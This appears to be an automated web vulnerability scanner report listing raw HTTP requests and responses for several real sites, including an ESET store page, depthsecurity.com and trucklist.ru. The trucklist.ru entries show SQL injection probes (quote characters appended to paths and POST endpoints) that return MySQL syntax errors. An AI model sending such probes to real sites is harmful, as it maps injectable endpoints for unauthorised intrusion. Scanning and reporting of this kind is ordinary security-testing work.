HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:30:40 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -804063199:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 48736 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
GET /s.nl?alias=&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:30:43 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -2027509818:73686F70 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54627 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /s.nl |
GET /s.nl?sc=3&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:25:14 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -1248004410:73686F70 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 48959 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
GET /s.nl?sc=3&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:25:16 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -804103430:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54845 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.depthsecurity |
Path: | /WebResource.axd |
GET /WebResource.axd?d= Host: www.depthsecurity.com Connection: keep-alive Referer: https://www.depthsecurity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=5781286.1303735972 |
HTTP/1.1 302 Denied Content-Type: text/html Location: http://www.depthsecurity X-dotDefender-denied: 1 Server: DepthServ-FU/8.0 X-Powered-By: DepthScript.fu Date: Mon, 25 Apr 2011 13:11:33 GMT Connection: close <html></html> |
GET /WebResource.axd?d= Host: www.depthsecurity.com Connection: keep-alive Referer: https://www.depthsecurity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=5781286.1303735972 |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6045 Content-Type: text/html; charset=utf-8 Server: DepthServ-FU/8.0 X-Powered-By: DepthScript.fu Date: Mon, 25 Apr 2011 13:11:33 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Depth Security - A Trusted Information Security Partner</title> <link rel="stylesheet" type="text/css" href="css/style.css" /> <link rel="SHORTCUT ICON" href="images/icon.jpg" /> <meta name="keywords" content="Information Security Partner, Information Security Advisor, Network Security, Web Application Security, Depth Security, Vendor Independent Security Services, Security Architecture and Design" /> <meta name="description" /> <meta name="robots" content="all" /> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> </head> <body class="main"> <div id="page"> <div id="header-holder"> <div id="header"> <div class="logo"><a href="home.aspx"><img src="images/logo_221x53 <div id="header-nav"> <div class="option"><div class="hot1"><a href="home.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div> <div class="option"><div class="link2"><a href="company.aspx"><img src="images/1px.gif" width="66" height="14" /></a></div></div> <div class="option"><div class="link3"><a href="services.aspx"><img src="images/1px.gif" width="62" height="14" /></a></div></div> <div class="option"><div class="link4"><a href="applicure <div class="option" style="border-right:none; <div class ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.depthsecurity |
Path: | /WebResource.axd |
GET /WebResource.axd?d= Host: www.depthsecurity.com Connection: keep-alive Referer: https://www.depthsecurity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=5781286.1303735972 |
HTTP/1.1 302 Denied Content-Type: text/html Location: http://www.depthsecurity X-dotDefender-denied: 1 Server: DepthServ-FU/8.0 X-Powered-By: DepthScript.fu Date: Mon, 25 Apr 2011 13:11:50 GMT Connection: close <html></html> |
GET /WebResource.axd?d= Host: www.depthsecurity.com Connection: keep-alive Referer: https://www.depthsecurity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=5781286.1303735972 |
HTTP/1.1 200 OK Cache-Control: public Content-Length: 3005 Content-Type: application/x-javascript Expires: Tue, 24 Apr 2012 13:10:53 GMT Last-Modified: Thu, 31 Dec 2009 16:47:40 GMT Server: DepthServ-FU/8.0 X-Powered-By: DepthScript.fu Date: Mon, 25 Apr 2011 13:11:51 GMT function WebForm_FindFirstFoc if (!control || !(control.tagName)) { return null; } var tagName = control.tagName if (tagName == "undefined") { return null; } var children = control.childNodes; if (children) { for (var i = 0; i < children.length; i++) { try { if (WebForm_CanFocus return children[i]; } else { var focused = WebForm_FindFirstFoc if (WebForm_CanFocus(focused return focused; } } } catch (e) { } } } return null; } function WebForm_AutoFocus(focusId var targetControl; if (__nonMSDOMBrowser) { targetControl = document.getElementById } else { targetControl = document.all[focusId]; } var focused = targetControl; if (targetControl && (!WebForm_CanFocus focused = WebForm_FindFirstFoc } if (focused) { try { focused.focus(); if (__nonMSDOMBrowser) { focused.scrollIntoView } if (window.__smartNav) { window.__smartNav.ae = focused.id; } } catch (e) { } } } function WebForm_CanFocus(element) { if (!element || !(element.tagName)) return false; var tagName = element.tagName return (!(element.disabled) && (!( ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.eset.com |
Path: | /us/ |
GET /us/ HTTP/1.1 Host: www.eset.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a |
HTTP/1.1 200 OK Server: Apache Set-Cookie: PHPSESSID=rhlh0535fs Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:15:10 GMT Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 26653 Date: Mon, 25 Apr 2011 15:15:10 GMT X-Varnish: 555648175 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>E ...[SNIP]... +"="+escape(cookieValue) + ";expires="+expire } var speed = 'fast'; var j = jQuery.noConflict(); var selectedTab = 0; j(document).ready j("#bannerWrapper").css({ j("#tab"+selectedTab) j("#tab"+selectedTab) j("#link_tab"+selectedTab j(".clicker").live('click var linkId = j(this).attr('id').split( var tab = linkId[1]; var indx = null; j('.clicker').each if(j(this).hasClass( { indx = j(this).attr('id').split( j(this).removeClass( } }); indexNum = indx[1].replace(/[^\d]+/i var clicked = tab.replace(/[^\d]+/i,'') var diff = clicked-indexNum; j('#bannerWrapper') j(this).addClass( j('.visible').fadeOut j(this).removeClass( j('#'+tab).fadeIn(speed); j('#'+tab).addClass( SetCookie('tab', selectedTab,-1); SetCookie('tab', clicked,1); }); return false; }); }); </script> <style type="text/css" media="all"> div.hidden{ display:none; } div.visible{ display: block; } div.page_banner{ width: 980px; float: left; } div#bannerWrapper { width: 1960px; position: absolute; left: 0; } </style> <div style="width: 980px; overflow: hidden; height: 250px;"> <div id="bannerWrapper" > <div class="page_banner" id="img_tab0"> <a href="/us/home/smart <h1> <div style="background-image <div style="position:absolute; top:127px; left: 433px"> <a href="/us/home/smart ...[SNIP]... |
GET /us/ HTTP/1.1 Host: www.eset.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=gnk9ss0g8a |
HTTP/1.1 200 OK Server: Apache Set-Cookie: PHPSESSID=p3m54lfggu Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:15:11 GMT Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 26683 Date: Mon, 25 Apr 2011 15:15:11 GMT X-Varnish: 555648227 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> <title>E ...[SNIP]... e+"="+escape(cookieValue) + ";expires="+expire } var speed = 'fast'; var j = jQuery.noConflict(); var selectedTab = 0; j(document).ready j("#tab"+selectedTab) j("#tab"+selectedTab) j("#link_tab"+selectedTab j("#bannerWrapper").css({ j(".clicker").live('click var linkId = j(this).attr('id').split( var tab = linkId[1]; var indx = null; j('.clicker').each if(j(this).hasClass( { indx = j(this).attr('id').split( j(this).removeClass( } }); indexNum = indx[1].replace(/[^\d]+/i var clicked = tab.replace(/[^\d]+/i,'') var diff = clicked-indexNum; j('#bannerWrapper') j(this).addClass( j('.visible').fadeOut j(this).removeClass( j('#'+tab).fadeIn(speed); j('#'+tab).addClass( SetCookie('tab', selectedTab,-1); SetCookie('tab', clicked,1); }); return false; }); }); </script> <style type="text/css" media="all"> div.hidden{ display:none; } div.visible{ display: block; } div.page_banner{ width: 980px; float: left; } div#bannerWrapper { width: 1960px; position: absolute; left: 0; } </style> <div style="width: 980px; overflow: hidden; height: 250px;"> <div id="bannerWrapper"> <div class="page_banner" id="img_tab0"> <a href="/us/home/smart <h1> <div style="background-image <div style="position:absolute; top:127px; left: 433px"> <a href="/us/home/smart ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trucklist.ru |
Path: | /cars/undefined |
GET /cars'/undefined HTTP/1.1 Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 15:00:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:45:31 GMT Content-Length: 6600 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
GET /cars''/undefined HTTP/1.1 Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 15:00:18 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 15:00:18 GMT Content-Length: 4387 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trucklist.ru |
Path: | /cars/undefined |
GET /cars/undefined' HTTP/1.1 Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 15:02:39 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 15:02:39 GMT Content-Length: 6600 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
GET /cars/undefined'' HTTP/1.1 Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 15:02:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:48:03 GMT Content-Length: 4387 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 Host: www.trucklist.ru Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 15:00:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 15:00:05 GMT Content-Length: 6594 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /plugins/ajax/enums.php |
POST /plugins/ajax/enums.php' HTTP/1.1 Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru Origin: http://www.trucklist.ru X-Prototype-Version: 1.6.0.2 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-type: application/x-www-form Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 Content-Length: 19 name=truck_make_&_= |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:49:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:49:45 GMT Content-Length: 6616 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /plugins/ajax/enums.php |
POST /plugins/ajax/enums.php/1' HTTP/1.1 Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru Origin: http://www.trucklist.ru X-Prototype-Version: 1.6.0.2 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-type: application/x-www-form Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 Content-Length: 19 name=truck_make_&_= |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:48:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:33:25 GMT Content-Length: 6620 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /vendors/calendar/super |
GET /vendors/calendar/super Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:47:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:32:52 GMT Content-Length: 6640 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/css |
GET /webroot/delivery/css Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:53:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:39:13 GMT Content-Length: 6634 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
GET /webroot/delivery/css Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:54:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:39:25 GMT Content-Length: 4387 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Date: Mon, 25 Apr 2011 14:47:36 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.2.11 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 25 Apr 2011 14:47:36 GMT Content-Length: 6630 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>TRUCKLIST.RU - ............ 404</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <lin ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.trucklist.ru |
Path: | /webroot/delivery/js |
GET /webroot/delivery/js Host: www.trucklist.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=94671815d7 |
